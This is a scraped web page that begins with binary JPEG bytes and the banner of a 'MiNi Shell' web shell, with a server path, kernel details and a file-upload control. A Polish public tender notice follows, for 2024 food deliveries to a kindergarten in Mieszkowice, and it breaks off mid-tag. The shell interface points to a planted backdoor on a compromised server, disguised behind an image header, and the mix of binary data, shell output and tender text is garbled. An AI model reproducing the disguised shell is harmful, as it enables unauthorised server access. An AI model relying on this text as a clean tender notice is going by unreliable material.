JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231115/0049435101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa artykułów żywnościowych do Przedszkola Samorządowego w Mieszkowicach w roku 2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedszkole Samorządowe</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 320916300</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Willowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mieszkowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-505</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przedszkolemieszkowice@poczta.fm</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.przedszkolemieszkowice.szkolnastrona.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa artykułów żywnościowych do Przedszkola Samorządowego w Mieszkowicach w roku 2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6b5e543a-838f-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00494351</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.przedszkolemieszkowice.szkolnastrona.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu odbywa się elektronicznie za pośrednictwem platformy<br/>(portalu) https://platformazakupowa.pl/pn/mieszkowice i formularza &#34;Wyślij wiadomość&#34;.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6. Oferta, podmiotowe środki dowodowe oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie<br/>muszą zostać podpisane elektronicznym kwalifikowanym podpisem.<br/>7. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ<br/>8. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem<br/>platformy https://platformazakupowa.pl/pn/mieszkowice Wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat<br/>systemowy &#34;pytanie wysłane&#34;.<br/>9. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego akceptuje warunki korzystania z<br/>platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz<br/>uznaje go za wiążący, zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>10. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez zamawiającego za<br/>ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony<br/>w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>11. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem II SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna, codzienna dostawa artykułów żywnościowych w zależności od aktualnych<br/>potrzeb Zamawiającego do Przedszkola Samorządowego w Mieszkowicach, ul Willowa 1:<br/>Mięso, wędliny, świeży drób<br/>1	Mięso gulaszowe z indyka	kg	60<br/>2	Filet z piersi kurczaka	kg	350<br/>3	Filet z indyka bez skóry	kg 50<br/>4	Kurczak w całości	kg 200<br/>5	Podudzie z kurczaka	kg	220<br/>6	Skrzydełka z kurczaka	kg	40<br/>7	Porcje rosołowe z kurczaka	kg	1000<br/>8	Polędwiczki wieprzowe	kg	100<br/>9	Szynka wieprzowa „myszka”	kg 100<br/>10	Karkówka b/k	kg	220<br/>11	Łopatka wieprzowa b/k	kg	220<br/>12	Szynka wieprzowa b/k	kg	50<br/>13	Słonina	kg	20<br/>14	Schab wieprzowy b/k	kg	120<br/>15	Kiełbasa śląska	kg	20<br/>16	Kiełbasa chłopska	kg	50<br/>17	Parówki z szynki	kg	55<br/>18	Pasztetowa drobiowa	szt. 30<br/>19	Udko wędzone drobiowe	kg	50<br/>20	Wędlina-kurczak gotowany	kg	20<br/>21	Wędlina-krakowska drobiowa parzona	kg	20<br/>22	Porcja rosołowa z kaczki	kg	70<br/>23	Szponder wołowy	kg	15<br/>24	Parówki cielęce	kg	30<br/>25	Pieczeń rzymska	kg	10<br/>26	Wędlina-szynka tyrolska	kg	40<br/>27	Wędlina-Filet specjał	kg	40<br/>28	Wędlina-Polędwica sopocka	kg	30<br/>29	Wędlina-szynka gotowana	kg	30<br/>30	Wędlina-schab wiejski	kg	30<br/>31	Wędlina-szynkowa drobiowa	kg	30<br/>32	Wędlina-polędwica drobiowa	kg	30<br/>33	Wędlina-szynka pieczona	kg	40<br/>34	Wędlina-kiełbasa żywiecka	kg	30 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15113000-3 - Wieprzowina</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15131130-5 - Wędliny</p> <p class="mb-0">15131400-9 - Produkty wieprzowe</p> <p class="mb-0">15112000-6 - Drób</p> <p class="mb-0">15112100-7 - Świeży drób</p> <p class="mb-0">15131135-0 - Wędliny drobiowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna, codzienna dostawa artykułów żywnościowych w zależności od aktualnych<br/>potrzeb Zamawiającego do Przedszkola Samorządowego w Mieszkowicach, ul Willowa 1:<br/>Pieczywo<br/>1	Bułka grahamka	szt	2000<br/>2	Bułka pszenna duża	szt	6500<br/>3	Chleb mieszany (krojony)	szt 1400<br/>4	Chleb graham (krojony)	szt	1000<br/>5	Chałka	szt 150<br/>6	Drożdżówka mini z dżemem	szt	200<br/>7	Drożdżówka z serem	szt	400<br/>8	Rogal maślany	szt	650<br/>9	Bułka maślana	szt 1000<br/>10	Rogaliki drożdżowe z nadzieniem	kg	45<br/>11	Bułka razowa	szt	2000<br/>12	Bułka pszenna mała	szt 100<br/>13	Rogal z makiem	szt	450<br/>14	Chleb razowy	szt	1000 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna, codzienna dostawa artykułów żywnościowych w zależności od aktualnych<br/>potrzeb Zamawiającego do Przedszkola Samorządowego w Mieszkowicach, ul Willowa 1:<br/>Różne produkty spożywcze i miód naturalny<br/>1.	Ananas w puszce, bez dodatku chemicznych substancji do żywności	szt	10<br/>2.	Biszkopty bez zawartości masy jajowej i emulgatorów typu E	szt	300<br/>3.	Bazylia suszona	szt	50<br/>4.	Brzoskwinie połówki w syropie, bez dodatku chemicznych substancji do żywności	szt	10<br/>5.	Budyń o smaku śmietankowym, bez dodatku cukru	szt.	250<br/>6.	Budyń o smaku waniliowym, bez dodatku cukru	szt	250<br/>7.	Cynamon bez barwników, konserwantów i glutaminianu sodu	szt	30<br/>8.	Czosnek granulowany bez barwników, konserwantów i glutaminianu sodu	szt	100<br/>9.	Cukier waniliowy	szt	40<br/>10.	Curry bez barwników, konserwantów i glutaminianu sodu	szt	15<br/>11.	Cukier biały	1kg	450<br/>12	Czekolada gorzka min. 70% kakao	szt	50<br/>13	Cukier puder, niezbrylony torba foliowa	szt	10<br/>14	Dżem owocowy niskosłodzony, 100% owoców	szt	300<br/>15	Fasola czerwona konserwowa puszka bez dodatku cukru i substancji słodzących oraz soli, bez konserwantów	sz	10<br/>16	Fasola sucha drobna	szt	20<br/>17	Groszek konserwowy wysokogatunkowy	szt	50<br/>18	Groch łuskany, połówki	szt	40<br/>19	Herbatniki szt	850<br/>20	Herbata czarna granulowana, wysokogatunkowa	szt	100<br/>21	Herbata czarna ekspresowa 100 saszetek wysokogatunkowa	szt	15<br/>22	Herbata miętowa ziołowa (saszetki) skład 100 % liścia mięty	szt	30<br/>23	Herbata owocowo-ziołowa (saszetki) zawierająca wyłącznie naturalne składniki	szt	30<br/>24	Koncentrat pomidorowy bez konserwantów kl. I minimalna zawartość ekstraktu 30 % typu	szt	70<br/>25	Kawa zbożowa bez cukru	szt	80<br/>26	Kukurydza konserwowa słodka bez dodatku cukru, wysokogatunkowa szt	80<br/>27	Kakao ciemne nie akalizowane o obniżonej zawartości tłuszczu zawierające min.11 % tłuszczu kakaowego	szt	300<br/>28	Ketchup łagodny bez konserwantów zawierający min.190g pomidorów na 100g produktu	szt	60<br/>29	Kasza jęczmienna gruba w papierowej torbie	kg	100<br/>30	Kasza manna gat.I	kg	40<br/>31	Liść laurowy bez barwników, konserwantów i glutaminianu sodu	szt	100<br/>32	Makaron świdry z mąki pszennej bez zawartości masy jajecznej i kurkumy	szt	300<br/>33	Makaron pióra z mąki pszennej bez zawartości masy jajecznej i kurkumy	szt	300<br/>34	Makaron nitka cięta z mąki pszennej bez zawartości masy jajecznej i kurkumy	szt	300<br/>35	Makaron kokardka mała z mąki pszennej bez zawartości masy jajecznej i kurkumy	szt	250<br/>36	Makaron muszelka z mąki pszennej bez zawartości masy jajecznej i kurkumy	sz	100<br/>37	Makaron pióra z mąki pszennej bez zawartości masy jajecznej i kurkumy	szt	50<br/>38	Mąka ziemniaczana w torbie papierowej	szt	50<br/>39	Mąka pszenna wrocławska typ 500 w torbie papierowej	szt	250<br/>40	Miód pszczeli nektarowy różne smaki produkt polski	szt	50<br/>41	Miód pszczeli nektarowy różne smaki produkt polski	szt	200<br/>42	Morela suszona bez barwników i konserwantów	szt	20<br/>43	Majonez dekoracyjny wysokogatunkowy	szt	80<br/>44	Musztarda sarepska wysokogatunkowa bez konserwantów	szt	20<br/>45	Majeranek bez barwników, konserwantów i glutaminianu sodu.	szt	100<br/>46	Naturalna woda mineralna nisko lub średnio zmineralizowana w butelce	szt	500<br/>47	Oliwa z oliwek EXTRA VIGRINE	szt	5<br/>48	Olej rzepakowy z pierwszego tłoczenia rafinowany	szt	100<br/>49	Ocet jabłkowy	szt	5<br/>50	Ocet 10%	szt	5<br/>51	Oregano bez barwników, konserwantów i glutaminianu sodu	szt	80<br/>52	Ogórki konserwowe zawierające nie więcej niż 1g soli w 100g produktu	szt	50<br/>53	Płatki kukurydziane z zawartością grysu kukurydzianego minimum 98%	szt	250<br/>54	Płatki owsiane 200	szt	250<br/>55	Papryka słodka bez barwników, konserwantów i glutaminianu sodu	szt	100<br/>56	Papryka ostra bez barwników, konserwantów i glutaminianu sodu	szt	80<br/>57	Pieprz czarny mielony bez konserwantów i glutaminianu sodu	szt	150<br/>58	Pieprz ziołowy bez konserwantów i glutaminianu sodu	szt	100<br/>59	Proszek do pieczenia	szt	20<br/>60	Pomidory całe bez skórki w soku pomidorowym bez konserwantów	sz	100<br/>61	Ryż biały ziarnisty sypki torba papierowa	kg	100<br/>62	Ryż paraboliczny opakowanie zawierające 4x100g szt	250<br/>63	Rodzynki sułtanki bez substancji konserwujących	szt	30<br/>64	Sól o obniżonej zawartości sodu (sodowo-potasowa)	szt 10<br/>65	Sól spożywcza jodowana niezbrylona szt	110<br/>66	Syrop owocowy malina bez barwników i konserwantów	szt	50<br/>67	Syrop owocowy truskawka bez barwników i konserwantów	szt	20<br/>68	Sok 100% częściowo zagęszczony z soków z dodatkiem witamin ze słomką, wysokogatunkowy	szt	600<br/>69	Sok przecierowy zagęszczony 100% owoców bez dodatku cukru	szt	200<br/>70	Sok marchwiowo-owocowy (mix smaków)	szt	400<br/>71	Soda oczyszczona	szt	40<br/>72	Szczaw konserwowy krojony szt	70<br/>73	Tymianek bez barwników, konserwantów i glutaminianu sodu	szt	80<br/>74	Wafelek bez czekolady	szt	600<br/>75	Ziele angielskie bez barwników, konserwantów i glutaminianu sodu szt	100<br/>76	Żurawina suszona bez substancji konserwujących	szt	30<br/>77	Morela suszona bez substancji konserwujących	szt	30<br/>78	Mąka graham typ 1850	szt	50<br/>79	Pałeczki kukurydziane (nie chrupki) bez glutenu i konserwantów	szt	50<br/>80	Wiórki kokosowe	szt	10<br/>81	Ziarno słonecznika łuskane, bez konserwantów	szt	10<br/>82	Zioła prowansalskie	szt	15 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 